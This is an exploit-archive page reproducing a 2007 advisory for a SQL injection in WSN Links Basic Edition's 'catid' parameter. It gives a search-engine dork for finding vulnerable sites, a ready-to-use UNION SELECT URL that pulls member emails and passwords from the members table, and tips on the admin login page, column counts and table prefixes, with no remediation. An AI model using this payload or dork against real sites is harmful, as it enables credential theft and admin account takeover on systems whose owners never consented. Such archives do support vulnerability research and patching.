WSN Links Basic Edition - 'catid' SQL Injection

EDB-ID:

4209


Author:

t0pP8uZz

Type:

webapps


Platform:

PHP

Date:

2007-07-21


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

--==+================================================================================+==--
--==+		    WSN Links Basic Edition SQL Injection Vulnerbility	             +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog
SITE: wsnforum.com
DORK: Google: intext:"Powered by WSN Links Basic Edition"     Altavista: "Powered by WSN Links Basic Edition"


DESCRIPTION: 
pull out member info from the database


EXPLOITS:
http://www.server.com/Script_Dir/index.php?action=displaycat&catid=1/**/and/**/1=2/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,concat(email,0x3a,password),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/**/FROM/**/wsnlinks_members/**/LIMIT/**/0,1/*


NOTE/TIP: 
admin login is at Script_Dir/adminlogin.php usually the first user is admin
also the amount of 'columns' may differ althou its normally 35 or 28.
the script also uses table prefix, the most used are wsnlinks and wsn so that would make the table wsn_members ect.


GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net !



--==+================================================================================+==--
--==+		    WSN Links Basic Edition SQL Injection Vulnerbility	             +==--
--==+================================================================================+==--

# milw0rm.com [2007-07-21]